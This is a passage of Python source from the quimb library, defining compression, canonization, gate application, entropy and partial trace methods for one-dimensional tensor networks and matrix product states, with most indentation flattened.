cur_orthog : int, sequence of int, or 'calc'
If given, the current site(s), so as to shift the orthogonality
            center as efficiently as possible. If 'calc', calculate the
current orthogonality center.
bra : MatrixProductState, optional
If supplied, simultaneously mixed canonize this MPS too, assuming
it to be the conjugate state.
"""
if isinstance(where, int):
i = j = where
else:
i, j = min(where), max(where)
if cur_orthog == 'calc':
cur_orthog = self.calc_current_orthog_center()
if cur_orthog is not None:
if isinstance(cur_orthog, int):
cmin = cmax = cur_orthog
else:
cmin, cmax = min(cur_orthog), max(cur_orthog)
if cmax > j:
self.shift_orthogonality_center(cmax, j, bra=bra)
if cmin < i:
self.shift_orthogonality_center(cmin, i, bra=bra)
else:
self.left_canonize(i, bra=bra)
self.right_canonize(j, bra=bra)
return self
def left_compress_site(self, i, bra=None, **compress_opts):
"""Left compress this 1D TN's ith site, such that the site is then
left unitary with its right bond (possibly) reduced in dimension.
Parameters
----------
i : int
Which site to compress.
bra : None or matching TensorNetwork to self, optional
If set, also update this TN's data with the conjugate compression.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
compress_opts.setdefault('absorb', 'right')
self._left_decomp_site(i, bra=bra, **compress_opts)
def right_compress_site(self, i, bra=None, **compress_opts):
"""Right compress this 1D TN's ith site, such that the site is then
right unitary with its left bond (possibly) reduced in dimension.
Parameters
----------
i : int
Which site to compress.
bra : None or matching TensorNetwork to self, optional
If set, update this TN's data with the conjugate compression.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
compress_opts.setdefault('absorb', 'left')
self._right_decomp_site(i, bra=bra, **compress_opts)
def left_compress(self, start=None, stop=None, bra=None, **compress_opts):
"""Compress this 1D TN, from left to right, such that it becomes
left-canonical (unless ``absorb != 'right'``).
Parameters
----------
start : int, optional
Site to begin compressing on.
stop : int, optional
Site to stop compressing at (won't itself be an isometry).
bra : None or TensorNetwork like this one, optional
If given, update this TN as well, assuming it to be the conjugate.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
if start is None:
start = -1 if self.cyclic else 0
if stop is None:
stop = self.L - 1
for i in range(start, stop):
self.left_compress_site(i, bra=bra, **compress_opts)
def right_compress(self, start=None, stop=None, bra=None, **compress_opts):
"""Compress this 1D TN, from right to left, such that it becomes
right-canonical (unless ``absorb != 'left'``).
Parameters
----------
start : int, optional
Site to begin compressing on.
stop : int, optional
Site to stop compressing at (won't itself be an isometry).
bra : None or TensorNetwork like this one, optional
If given, update this TN as well, assuming it to be the conjugate.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
if start is None:
start = self.L - (0 if self.cyclic else 1)
if stop is None:
stop = 0
for i in range(start, stop, -1):
self.right_compress_site(i, bra=bra, **compress_opts)
def compress(self, form=None, **compress_opts):
"""Compress this 1D Tensor Network, possibly into canonical form.
Parameters
----------
form : {None, 'flat', 'left', 'right'} or int
Output form of the TN. ``None`` left canonizes the state first for
stability reasons, then right_compresses (default). ``'flat'``
tries to distribute the singular values evenly -- state will not
be canonical. ``'left'`` and ``'right'`` put the state into left
and right canonical form respectively with a prior opposite sweep,
or an int will put the state into mixed canonical form at that
site.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
if form is None:
form = 'right'
if isinstance(form, Integral):
self.right_canonize()
self.left_compress(**compress_opts)
self.right_canonize(stop=form)
elif form == 'left':
self.right_canonize(bra=compress_opts.get('bra', None))
self.left_compress(**compress_opts)
elif form == 'right':
self.left_canonize(bra=compress_opts.get('bra', None))
self.right_compress(**compress_opts)
elif form == 'flat':
compress_opts['absorb'] = 'both'
self.right_compress(stop=self.L // 2, **compress_opts)
self.left_compress(stop=self.L // 2, **compress_opts)
else:
raise ValueError(f"Form specifier {form} not understood, should be"
" either 'left', 'right', 'flat' or an int "
"specifiying a new orthog center.")
def compress_site(self, i, canonize=True, cur_orthog='calc', bra=None,
**compress_opts):
r"""Compress the bonds adjacent to site ``i``, by default first setting
the orthogonality center to that site::
i i
-o-o-o-o-o- --> ->->~o~<-<-
| | | | | | | | | |
Parameters
----------
i : int
Which site to compress around
canonize : bool, optional
Whether to first set the orthogonality center to site ``i``.
cur_orthog : int, optional
If given, the known current orthogonality center, to speed up the
mixed canonization.
bra : MatrixProductState, optional
The conjugate state to also apply the compression to.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
"""
if canonize:
self.canonize(i, cur_orthog=cur_orthog, bra=bra)
if self.cyclic or i > 0:
self.left_compress_site(i - 1, bra=bra, **compress_opts)
if self.cyclic or i < self.L - 1:
self.right_compress_site(i + 1, bra=bra, **compress_opts)
def bond(self, i, j):
"""Get the name of the index defining the bond between sites i and j.
"""
bond, = self[i].bonds(self[j])
return bond
def bond_size(self, i, j):
"""Return the size of the bond between site ``i`` and ``j``.
"""
b_ix = self.bond(i, j)
return self[i].ind_size(b_ix)
def bond_sizes(self):
bnd_szs = [self.bond_size(i, i + 1) for i in range(self.L - 1)]
if self.cyclic:
bnd_szs.append(self.bond_size(-1, 0))
return bnd_szs
def singular_values(self, i, cur_orthog=None, method='svd'):
r"""Find the singular values associated with the ith bond::
....L.... i
o-o-o-o-o-l-o-o-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | |
i-1 ..........R..........
        Leaves the 1D TN in mixed canonical form at bond ``i``.
Parameters
----------
i : int
Which bond, or equivalently, the number of sites in the
left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization, e.g. if sweeping this function from left to
right would use ``i - 1``.
Returns
-------
svals : 1d-array
The singular values.
"""
if not (0 < i < self.L):
raise ValueError(f"Need 0 < i < {self.L}, got i={i}.")
self.canonize(i, cur_orthog)
Tm1 = self[i]
left_inds = Tm1.bonds(self[i - 1])
return Tm1.singular_values(left_inds, method=method)
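    # Sketch: for a normalized state the singular values across any bond
    # square-sum to one; assumes ``MPS_rand_state`` from ``quimb.tensor``:
    #
    #     >>> k = MPS_rand_state(6, bond_dim=4, normalize=True)
    #     >>> s = k.singular_values(3)
    #     >>> (s ** 2).sum()              # ~1.0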
def expand_bond_dimension(
self,
new_bond_dim,
rand_strength=0.0,
bra=None,
inplace=True,
):
"""Expand the bond dimensions of this 1D tensor network to at least
``new_bond_dim``.
Parameters
----------
new_bond_dim : int
Minimum bond dimension to expand to.
inplace : bool, optional
Whether to perform the expansion in place.
bra : MatrixProductState, optional
Mirror the changes to ``bra`` inplace, treating it as the conjugate
state.
rand_strength : float, optional
If ``rand_strength > 0``, fill the new tensor entries with gaussian
noise of strength ``rand_strength``.
Returns
-------
MatrixProductState
"""
tn = super().expand_bond_dimension(
new_bond_dim=new_bond_dim,
rand_strength=rand_strength,
inplace=inplace,
)
if bra is not None:
for coo in tn.gen_site_coos():
bra[coo].modify(data=tn[coo].data.conj())
return tn
def count_canonized(self):
if self.cyclic:
return 0, 0
ov = self.H & self
num_can_l = 0
num_can_r = 0
def isidentity(x):
d = x.shape[0]
if get_dtype_name(x) in ('float32', 'complex64'):
rtol, atol = 1e-5, 1e-6
else:
rtol, atol = 1e-9, 1e-11
idtty = do('eye', d, dtype=x.dtype, like=x)
return do('allclose', x, idtty, rtol=rtol, atol=atol)
for i in range(self.L - 1):
ov ^= slice(max(0, i - 1), i + 1)
x = ov[i].data
if isidentity(x):
num_can_l += 1
else:
break
for j in reversed(range(i + 1, self.L)):
ov ^= slice(j, min(self.L, j + 2))
x = ov[j].data
if isidentity(x):
num_can_r += 1
else:
break
return num_can_l, num_can_r
def calc_current_orthog_center(self):
"""Calculate the site(s) of the current orthogonality center.
Returns
-------
int or (int, int)
The site, or min/max, around which this MPS is orthogonal.
"""
lo, ro = self.count_canonized()
i, j = lo, self.L - ro - 1
        return i if i == j else (i, j)
def as_cyclic(self, inplace=False):
"""Convert this flat, 1D, TN into cyclic form by adding a dummy bond
between the first and last sites.
"""
tn = self if inplace else self.copy()
# nothing to do
if tn.cyclic:
return tn
tn.new_bond(0, -1)
tn.cyclic = True
return tn
def show(self, max_width=None):
l1 = ""
l2 = ""
l3 = ""
num_can_l, num_can_r = self.count_canonized()
for i in range(self.L - 1):
bdim = self.bond_size(i, i + 1)
strl = len(str(bdim))
l1 += f" {bdim}"
l2 += (">" if i < num_can_l else
"<" if i >= self.L - num_can_r else
"●") + ("─" if bdim < 100 else "━") * strl
l3 += "│" + " " * strl
strl = len(str(bdim))
l1 += " "
l2 += "<" if num_can_r > 0 else "●"
l3 += "│"
if self.cyclic:
bdim = self.bond_size(0, self.L - 1)
bnd_str = ("─" if bdim < 100 else "━") * strl
l1 = f" {bdim}{l1}{bdim} "
l2 = f"+{bnd_str}{l2}{bnd_str}+"
l3 = f" {' ' * strl}{l3}{' ' * strl} "
print_multi_line(l1, l2, l3, max_width=max_width)
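# Sketch of inspecting a flat 1D TN, assuming ``MPS_rand_state`` from
# ``quimb.tensor`` is importable; ``show`` draws the bond dimensions and the
# current canonical form (e.g. ``>->->-●-<-<`` style arrows):
#
#     >>> k = MPS_rand_state(6, bond_dim=4)
#     >>> k.canonize(3)
#     >>> k.show()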
class MatrixProductState(TensorNetwork1DVector,
TensorNetwork1DFlat,
TensorNetwork1D,
TensorNetwork):
"""Initialise a matrix product state, with auto labelling and tagging.
Parameters
----------
arrays : sequence of arrays
The tensor arrays to form into a MPS.
shape : str, optional
        String specifying the layout of the tensors. E.g. 'lrp' (the default)
        indicates the shape corresponds to left-bond, right-bond, physical
        index. End tensors have either 'l' or 'r' dropped from the string.
site_ind_id : str
        A string specifying how to label the physical site indices. Should
contain a ``'{}'`` placeholder. It is used to generate the actual
indices like: ``map(site_ind_id.format, range(len(arrays)))``.
site_tag_id : str
        A string specifying how to tag the tensors at each site. Should
contain a ``'{}'`` placeholder. It is used to generate the actual tags
like: ``map(site_tag_id.format, range(len(arrays)))``.
tags : str or sequence of str, optional
Global tags to attach to all tensors.
bond_name : str, optional
The base name of the bond indices, onto which uuids will be added.
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_site_ind_id',
'cyclic',
'_L',
)
def __init__(self, arrays, *, shape='lrp', tags=None, bond_name="",
site_ind_id='k{}', site_tag_id='I{}', **tn_opts):
# short-circuit for copying MPSs
if isinstance(arrays, MatrixProductState):
super().__init__(arrays)
return
arrays = tuple(arrays)
self._L = len(arrays)
# process site indices
self._site_ind_id = site_ind_id
site_inds = map(site_ind_id.format, range(self.L))
# process site tags
self._site_tag_id = site_tag_id
site_tags = map(site_tag_id.format, range(self.L))
if tags is not None:
# mix in global tags
tags = tags_to_oset(tags)
site_tags = (tags | oset((st,)) for st in site_tags)
self.cyclic = (ops.ndim(arrays[0]) == 3)
# transpose arrays to 'lrp' order.
def gen_orders():
lp_ord = tuple(shape.replace('r', "").find(x) for x in 'lp')
lrp_ord = tuple(shape.find(x) for x in 'lrp')
rp_ord = tuple(shape.replace('l', "").find(x) for x in 'rp')
yield lp_ord if not self.cyclic else lrp_ord
for _ in range(self.L - 2):
yield lrp_ord
yield rp_ord if not self.cyclic else lrp_ord
def gen_inds():
cyc_bond = (rand_uuid(base=bond_name),) if self.cyclic else ()
nbond = rand_uuid(base=bond_name)
yield cyc_bond + (nbond, next(site_inds))
pbond = nbond
for _ in range(self.L - 2):
nbond = rand_uuid(base=bond_name)
yield (pbond, nbond, next(site_inds))
pbond = nbond
yield (pbond,) + cyc_bond + (next(site_inds),)
def gen_tensors():
for array, site_tag, inds, order in zip(arrays, site_tags,
gen_inds(), gen_orders()):
yield Tensor(transpose(array, order), inds=inds, tags=site_tag)
super().__init__(gen_tensors(), virtual=True, **tn_opts)
@classmethod
def from_dense(cls, psi, dims, site_ind_id='k{}',
site_tag_id='I{}', **split_opts):
"""Create a ``MatrixProductState`` directly from a dense vector
Parameters
----------
psi : array_like
The dense state to convert to MPS from.
dims : sequence of int
Physical subsystem dimensions of each site.
site_ind_id : str, optional
How to index the physical sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductState`.
site_tag_id : str, optional
How to tag the physical sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductState`.
split_opts
            Supplied to :func:`~quimb.tensor.tensor_core.tensor_split` in
            order to partition the dense vector into tensors.
Returns
-------
MatrixProductState
Examples
--------
>>> dims = [2, 2, 2, 2, 2, 2]
>>> psi = rand_ket(prod(dims))
>>> mps = MatrixProductState.from_dense(psi, dims)
>>> mps.show()
2 4 8 4 2
o-o-o-o-o-o
| | | | | |
"""
set_default_compress_mode(split_opts)
L = len(dims)
inds = [site_ind_id.format(i) for i in range(L)]
T = Tensor(reshape(ops.asarray(psi), dims), inds=inds)
def gen_tensors():
# split
# <-- : yield
# : :
# OOOOOOO--O-O-O
# ||||||| | | |
# .......
# left_inds
TM = T
for i in range(L - 1, 0, -1):
TM, TR = TM.split(left_inds=inds[:i], get='tensors',
rtags=site_tag_id.format(i), **split_opts)
yield TR
TM.add_tag(site_tag_id.format(0))
yield TM
tn = TensorNetwork(gen_tensors())
return cls.from_TN(tn, cyclic=False, L=L,
site_ind_id=site_ind_id,
site_tag_id=site_tag_id)
def add_MPS(self, other, inplace=False, compress=False, **compress_opts):
"""Add another MatrixProductState to this one.
"""
if self.L != other.L:
raise ValueError("Can't add MPS with another of different length.")
new_mps = self if inplace else self.copy()
for i in new_mps.gen_site_coos():
t1, t2 = new_mps[i], other[i]
if set(t1.inds) != set(t2.inds):
# Need to use bonds to match indices
reindex_map = {}
if i > 0 or self.cyclic:
pair = ((i - 1) % self.L, i)
reindex_map[other.bond(*pair)] = new_mps.bond(*pair)
if i < new_mps.L - 1 or self.cyclic:
pair = (i, (i + 1) % self.L)
reindex_map[other.bond(*pair)] = new_mps.bond(*pair)
t2 = t2.reindex(reindex_map)
t1.direct_product_(t2, sum_inds=new_mps.site_ind(i))
if compress:
new_mps.compress(**compress_opts)
return new_mps
add_MPS_ = functools.partialmethod(add_MPS, inplace=True)
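    # Sketch of MPS addition followed by compression, assuming
    # ``MPS_computational_state`` from ``quimb.tensor`` is importable:
    #
    #     >>> up = MPS_computational_state('0000')
    #     >>> dn = MPS_computational_state('1111')
    #     >>> ghz = (up + dn) / 2 ** 0.5
    #     >>> ghz.compress()
    #     >>> max(ghz.bond_sizes())       # the GHZ state needs bond dim 2
    #     2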
def permute_arrays(self, shape='lrp'):
"""Permute the indices of each tensor in this MPS to match ``shape``.
This doesn't change how the overall object interacts with other tensor
networks but may be useful for extracting the underlying arrays
consistently. This is an inplace operation.
Parameters
----------
shape : str, optional
A permutation of ``'lrp'`` specifying the desired order of the
left, right, and physical indices respectively.
"""
for i in self.sites:
inds = {'p': self.site_ind(i)}
if self.cyclic or i > 0:
inds['l'] = self.bond(i, (i - 1) % self.L)
if self.cyclic or i < self.L - 1:
inds['r'] = self.bond(i, (i + 1) % self.L)
inds = [inds[s] for s in shape if s in inds]
self[i].transpose_(*inds)
def __add__(self, other):
"""MPS addition.
"""
return self.add_MPS(other, inplace=False)
def __iadd__(self, other):
"""In-place MPS addition.
"""
return self.add_MPS(other, inplace=True)
def __sub__(self, other):
"""MPS subtraction.
"""
return self.add_MPS(other * -1, inplace=False)
def __isub__(self, other):
"""In-place MPS subtraction.
"""
return self.add_MPS(other * -1, inplace=True)
def normalize(self, bra=None, eps=1e-15, insert=None):
"""Normalize this MPS, optional with co-vector ``bra``. For periodic
MPS this uses transfer matrix SVD approximation with precision ``eps``
in order to be efficient. Inplace.
Parameters
----------
bra : MatrixProductState, optional
If given, normalize this MPS with the same factor.
eps : float, optional
            If cyclic, precision with which to approximate the transfer
            matrix. Default: 1e-15.
        insert : int, optional
            Insert the corrective normalization on this site; defaults to the
            last site if not given.
Returns
-------
old_norm : float
The old norm ``self.H @ self``.
"""
norm = expec_TN_1D(self.H, self, eps=eps)
if insert is None:
insert = -1
self[insert].modify(data=self[insert].data / norm ** 0.5)
if bra is not None:
bra[insert].modify(data=bra[insert].data / norm ** 0.5)
return norm
def gate_split(self, G, where, inplace=False, **compress_opts):
r"""Apply a two-site gate and then split resulting tensor to retrieve a
MPS form::
-o-o-A-B-o-o-
| | | | | | -o-o-GGG-o-o- -o-o-X~Y-o-o-
| | GGG | | ==> | | | | | | ==> | | | | | |
| | | | | | i j i j
i j
As might be found in TEBD.
Parameters
----------
G : array
The gate, with shape ``(d**2, d**2)`` for physical dimension ``d``.
where : (int, int)
Indices of the sites to apply the gate to.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_split`.
See Also
--------
gate, gate_with_auto_swap
"""
tn = self if inplace else self.copy()
i, j = where
Ti, Tj = tn[i], tn[j]
ix_i, ix_j = tn.site_ind(i), tn.site_ind(j)
# Make Tensor of gate
d = tn.phys_dim(i)
TG = Tensor(reshape(ops.asarray(G), (d, d, d, d)),
inds=("_tmpi", "_tmpj", ix_i, ix_j))
# Contract gate into the two sites
TG = TG.contract(Ti, Tj)
TG.reindex_({"_tmpi": ix_i, "_tmpj": ix_j})
# Split the tensor
_, left_ix = Ti.filter_bonds(Tj)
set_default_compress_mode(compress_opts, self.cyclic)
nTi, nTj = TG.split(left_inds=left_ix, get='tensors', **compress_opts)
# make sure the new data shape matches and reinsert
Ti.modify(data=nTi.transpose_like_(Ti).data)
Tj.modify(data=nTj.transpose_like_(Tj).data)
return tn
gate_split_ = functools.partialmethod(gate_split, inplace=True)
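    # Sketch of a single TEBD-style gate application, assuming ``quimb`` is
    # imported as ``qu`` and ``MPS_computational_state`` is importable;
    # ``qu.CNOT()`` is taken to be the 4x4 controlled-not matrix:
    #
    #     >>> psi = MPS_computational_state('100')
    #     >>> psi.gate_split_(qu.CNOT(), (0, 1))     # |100> -> |110>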
def swap_sites_with_compress(self, i, j, cur_orthog=None,
inplace=False, **compress_opts):
"""Swap sites ``i`` and ``j`` by contracting, then splitting with the
physical indices swapped.
Parameters
----------
i : int
The first site to swap.
j : int
The second site to swap.
cur_orthog : int, sequence of int, or 'calc'
If known, the current orthogonality center.
        inplace : bool, optional
Perform the swaps inplace.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
"""
i, j = sorted((i, j))
if i + 1 != j:
raise ValueError("Sites aren't adjacent.")
mps = self if inplace else self.copy()
mps.canonize((i, j), cur_orthog)
# get site tensors and indices
ix_i, ix_j = map(mps.site_ind, (i, j))
Ti, Tj = mps[i], mps[j]
_, unshared = Ti.filter_bonds(Tj)
# split the contracted tensor, swapping the site indices
Tij = Ti @ Tj
lix = [i for i in unshared if i != ix_i] + [ix_j]
set_default_compress_mode(compress_opts, self.cyclic)
sTi, sTj = Tij.split(lix, get='tensors', **compress_opts)
# reindex and transpose the tensors to directly update original tensors
sTi.reindex_({ix_j: ix_i})
sTj.reindex_({ix_i: ix_j})
sTi.transpose_like_(Ti)
sTj.transpose_like_(Tj)
Ti.modify(data=sTi.data)
Tj.modify(data=sTj.data)
return mps
def swap_site_to(self, i, f, cur_orthog=None,
inplace=False, **compress_opts):
r"""Swap site ``i`` to site ``f``, compressing the bond after each
swap::
i f
0 1 2 3 4 5 6 7 8 9 0 1 2 4 5 6 7 3 8 9
o-o-o-x-o-o-o-o-o-o o-o-o-o-o-o-o-x-o-o
| | | | | | | | | | -> | | | | | | | | | |
Parameters
----------
i : int
The site to move.
f : int
The new location for site ``i``.
cur_orthog : int, sequence of int, or 'calc'
If known, the current orthogonality center.
        inplace : bool, optional
Perform the swaps inplace.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
"""
mps = self if inplace else self.copy()
if i == f:
return mps
if i < f:
js = range(i, f)
if f < i:
js = range(i - 1, f - 1, -1)
for j in js:
mps.swap_sites_with_compress(
j, j + 1, inplace=True, cur_orthog=cur_orthog, **compress_opts)
cur_orthog = (j, j + 1)
return mps
def gate_with_auto_swap(self, G, where, inplace=False,
cur_orthog=None, **compress_opts):
"""Perform a two site gate on this MPS by, if necessary, swapping and
compressing the sites until they are adjacent, using ``gate_split``,
then unswapping the sites back to their original position.
Parameters
----------
G : array
The gate, with shape ``(d**2, d**2)`` for physical dimension ``d``.
where : (int, int)
Indices of the sites to apply the gate to.
cur_orthog : int, sequence of int, or 'calc'
If known, the current orthogonality center.
        inplace : bool, optional
Perform the swaps inplace.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
See Also
--------
gate, gate_split
"""
mps = self if inplace else self.copy()
i, j = sorted(where)
need2swap = i + 1 != j
# move j site adjacent to i site
if need2swap:
mps.swap_site_to(j, i + 1, cur_orthog=cur_orthog,
inplace=True, **compress_opts)
cur_orthog = (i + 1, i + 2)
# make sure sites are orthog center, then apply and split
mps.canonize((i, i + 1), cur_orthog)
mps.gate_split_(G, (i, i + 1), **compress_opts)
# move j site back to original position
if need2swap:
mps.swap_site_to(i + 1, j, cur_orthog=(i, i + 1),
                             inplace=True, **compress_opts)
return mps
def magnetization(self, i, direction='Z', cur_orthog=None):
"""Compute the magnetization at site ``i``.
"""
if self.cyclic:
msg = ("``magnetization`` currently makes use of orthogonality for"
" efficiencies sake, for cyclic systems is it still "
"possible to compute as a normal expectation.")
raise NotImplementedError(msg)
self.canonize(i, cur_orthog)
# +-k-+
# | O |
# +-b-+
Tk = self[i]
ind1, ind2 = self.site_ind(i), '__tmp__'
Tb = Tk.H.reindex({ind1: ind2})
O_data = qu.spin_operator(direction, S=(self.phys_dim(i) - 1) / 2)
TO = Tensor(O_data, inds=(ind1, ind2))
return Tk.contract(TO, Tb)
def schmidt_values(self, i, cur_orthog=None, method='svd'):
r"""Find the schmidt values associated with the bipartition of this
MPS between sites on either site of ``i``. In other words, ``i`` is the
number of sites in the left hand partition::
....L.... i
o-o-o-o-o-S-o-o-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | |
i-1 ..........R..........
The schmidt values, ``S``, are the singular values associated with the
``(i - 1, i)`` bond, squared, provided the MPS is mixed canonized at
one of those sites.
Parameters
----------
i : int
The number of sites in the left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization.
Returns
-------
S : 1d-array
The schmidt values.
"""
if self.cyclic:
raise NotImplementedError
return self.singular_values(i, cur_orthog, method=method)**2
def entropy(self, i, cur_orthog=None, method='svd'):
"""The entropy of bipartition between the left block of ``i`` sites and
the rest.
Parameters
----------
i : int
The number of sites in the left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization.
Returns
-------
float
"""
if self.cyclic:
msg = ("For cyclic systems, try explicitly computing the entropy "
"of the (compressed) reduced density matrix.")
raise NotImplementedError(msg)
S = self.schmidt_values(i, cur_orthog=cur_orthog, method=method)
S = S[S > 0.0]
return do('sum', -S * do('log2', S))
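    # Sketch: the GHZ state carries exactly one bit of entanglement across
    # any bipartition; assumes ``MPS_ghz_state`` from ``quimb.tensor``:
    #
    #     >>> ghz = MPS_ghz_state(6)
    #     >>> ghz.entropy(3)              # ~1.0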
def schmidt_gap(self, i, cur_orthog=None, method='svd'):
"""The schmidt gap of bipartition between the left block of ``i`` sites
and the rest.
Parameters
----------
i : int
The number of sites in the left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization.
Returns
-------
float
"""
if self.cyclic:
raise NotImplementedError
S = self.schmidt_values(i, cur_orthog=cur_orthog, method=method)
if len(S) == 1:
return S[0]
return S[0] - S[1]
def partial_trace(self, keep, upper_ind_id="b{}", rescale_sites=True):
r"""Partially trace this matrix product state, producing a matrix
product operator.
Parameters
----------
keep : sequence of int or slice
            Indices of the sites to keep.
upper_ind_id : str, optional
The ind id of the (new) 'upper' inds, i.e. the 'bra' inds.
rescale_sites : bool, optional
If ``True`` (the default), then the kept sites will be rescaled to
``(0, 1, 2, ...)`` etc. rather than keeping their original site
numbers.
Returns
-------
rho : MatrixProductOperator
The density operator in MPO form.
"""
p_bra = self.copy()
p_bra.reindex_sites_(upper_ind_id, where=keep)
rho = self.H & p_bra
# now have e.g:
# | | | |
# o-o-o-o-o-o-o-o-o
# | | | | |
# o-o-o-o-o-o-o-o-o
# | | | |
if isinstance(keep, slice):
keep = self.slice2sites(keep)
keep = sorted(keep)
for i in self.gen_site_coos():
if i in keep:
# |
# -o- |
# ... -o- ... -> ... -O- ...
# i| i|
rho ^= self.site_tag(i)
else:
# |
# -o-o- |
# ... | ... -> ... -OO- ...
# -o-o- |i+1
# i |i+1
if i < self.L - 1:
rho >>= [self.site_tag(i), self.site_tag(i + 1)]
else:
rho >>= [self.site_tag(i), self.site_tag(max(keep))]
rho.drop_tags(self.site_tag(i))
# if single site a single tensor is produced
if isinstance(rho, Tensor):
rho = TensorNetwork([rho])
if rescale_sites:
# e.g. [3, 4, 5, 7, 9] -> [0, 1, 2, 3, 4]
retag, reind = {}, {}
for new, old in enumerate(keep):
retag[self.site_tag(old)] = self.site_tag(new)
reind[self.site_ind(old)] = self.site_ind(new)
reind[upper_ind_id.format(old)] = upper_ind_id.format(new)
rho.retag_(retag)
rho.reindex_(reind)
L = len(keep)
else:
L = self.L
# transpose upper and lower tags to match other MPOs
rho.view_as_(
MatrixProductOperator,
cyclic=self.cyclic, L=L, site_tag_id=self.site_tag_id,
lower_ind_id=upper_ind_id, upper_ind_id=self.site_ind_id, )
rho.fuse_multibonds(inplace=True)
return rho
def ptr(self, keep, upper_ind_id="b{}", rescale_sites=True):
"""Alias of :meth:`~quimb.tensor.MatrixProductState.partial_trace`.
"""
return self.partial_trace(keep, upper_ind_id,
rescale_sites=rescale_sites)
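    # Sketch of reducing a state to a two-site density operator, assuming
    # ``MPS_rand_state`` from ``quimb.tensor`` is importable:
    #
    #     >>> psi = MPS_rand_state(8, bond_dim=6)
    #     >>> rho = psi.ptr(keep=[2, 5])
    #     >>> rho.L, sorted(rho.outer_inds())
    #     (2, ['b0', 'b1', 'k0', 'k1'])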
def bipartite_schmidt_state(self, sz_a, get='ket', cur_orthog=None):
r"""Compute the reduced state for a bipartition of an OBC MPS, in terms
of the minimal left/right schmidt basis::
A B
......... ...........
>->->->->--s--<-<-<-<-<-< -> +-s-+
| | | | | | | | | | | | |
k0 k1... kA kB
Parameters
----------
sz_a : int
The number of sites in subsystem A, must be ``0 < sz_a < N``.
get : {'ket', 'rho', 'ket-dense', 'rho-dense'}, optional
Get the:
- 'ket': vector form as tensor.
- 'rho': density operator form, i.e. vector outer product
- 'ket-dense': like 'ket' but return ``qarray``.
- 'rho-dense': like 'rho' but return ``qarray``.
cur_orthog : int, optional
If given, take as the current orthogonality center so as to
            efficiently move it a minimal distance.
"""
if self.cyclic:
raise NotImplementedError("MPS must have OBC.")
s = do('diag', self.singular_values(sz_a, cur_orthog=cur_orthog))
if 'dense' in get:
kd = qu.qarray(s.reshape(-1, 1))
if 'ket' in get:
return kd
elif 'rho' in get:
return kd @ kd.H
else:
k = Tensor(s, (self.site_ind('A'), self.site_ind('B')))
if 'ket' in get:
return k
elif 'rho' in get:
return k & k.reindex({'kA': 'bA', 'kB': 'bB'})
@staticmethod
def _do_lateral_compress(mps, kb, section, leave_short, ul, ll, heps,
hmethod, hmax_bond, verbosity, compressed,
**compress_opts):
# section
# ul -o-o-o-o-o-o-o-o-o- ul -\ /-
# | | | | | | | | | ==> 0~~~~~0
# ll -o-o-o-o-o-o-o-o-o- ll -/ : \-
# hmax_bond
if leave_short:
            # if the section is short it doesn't make sense to laterally
            # compress - work out roughly when this occurs by comparing the
            # bond sizes
left_sz = mps.bond_size(section[0] - 1, section[0])
right_sz = mps.bond_size(section[-1], section[-1] + 1)
if mps.phys_dim() ** len(section) <= left_sz * right_sz:
if verbosity >= 1:
print(f"Leaving lateral compress of section '{section}' as"
f" it is too short: length={len(section)}, eff "
f"size={left_sz * right_sz}.")
return
if verbosity >= 1:
print(f"Laterally compressing section {section}. Using options: "
f"eps={heps}, method={hmethod}, max_bond={hmax_bond}")
section_tags = map(mps.site_tag, section)
kb.replace_with_svd(section_tags, (ul, ll), heps, inplace=True,
ltags='_LEFT', rtags='_RIGHT', method=hmethod,
max_bond=hmax_bond, **compress_opts)
compressed.append(section)
@staticmethod
def _do_vertical_decomp(mps, kb, section, sysa, sysb, compressed, ul, ur,
ll, lr, vmethod, vmax_bond, veps, verbosity,
**compress_opts):
if section == sysa:
label = 'A'
elif section == sysb:
label = 'B'
else:
return
section_tags = [mps.site_tag(i) for i in section]
if section in compressed:
# ----U---- | <- vmax_bond
# -\ /- / ----U----
# L~~~~R ==> \ ==>
# -/ \- / ----D----
# ----D---- | <- vmax_bond
# try and choose a sensible method
if vmethod is None:
left_sz = mps.bond_size(section[0] - 1, section[0])
right_sz = mps.bond_size(section[-1], section[-1] + 1)
if left_sz * right_sz <= 2**13:
# cholesky is not rank revealing
vmethod = 'eigh' if vmax_bond else 'cholesky'
else:
vmethod = 'isvd'
if verbosity >= 1:
print(f"Performing vertical decomposition of section {label}, "
f"using options: eps={veps}, method={vmethod}, "
f"max_bond={vmax_bond}.")
# do vertical SVD
kb.replace_with_svd(
section_tags, (ul, ur), right_inds=(ll, lr), eps=veps,
ltags='_UP', rtags='_DOWN', method=vmethod, inplace=True,
max_bond=vmax_bond, **compress_opts)
# cut joined bond by reindexing to upper- and lower- ind_id.
kb.cut_between((mps.site_tag(section[0]), '_UP'),
(mps.site_tag(section[0]), '_DOWN'),
f"_tmp_ind_u{label}",
f"_tmp_ind_l{label}")
else:
# just unfold and fuse physical indices:
# |
# -A-A-A-A-A-A-A- -AAAAAAA-
# | | | | | | | ===>
# -A-A-A-A-A-A-A- -AAAAAAA-
# |
if verbosity >= 1:
print(f"Just vertical unfolding section {label}.")
kb, sec = kb.partition(section_tags, inplace=True)
sec_l, sec_u = sec.partition('_KET', inplace=True)
T_UP = (sec_u ^ all)
T_UP.add_tag('_UP')
T_UP.fuse_({f"_tmp_ind_u{label}":
[mps.site_ind(i) for i in section]})
T_DN = (sec_l ^ all)
T_DN.add_tag('_DOWN')
T_DN.fuse_({f"_tmp_ind_l{label}":
[mps.site_ind(i) for i in section]})
kb |= T_UP
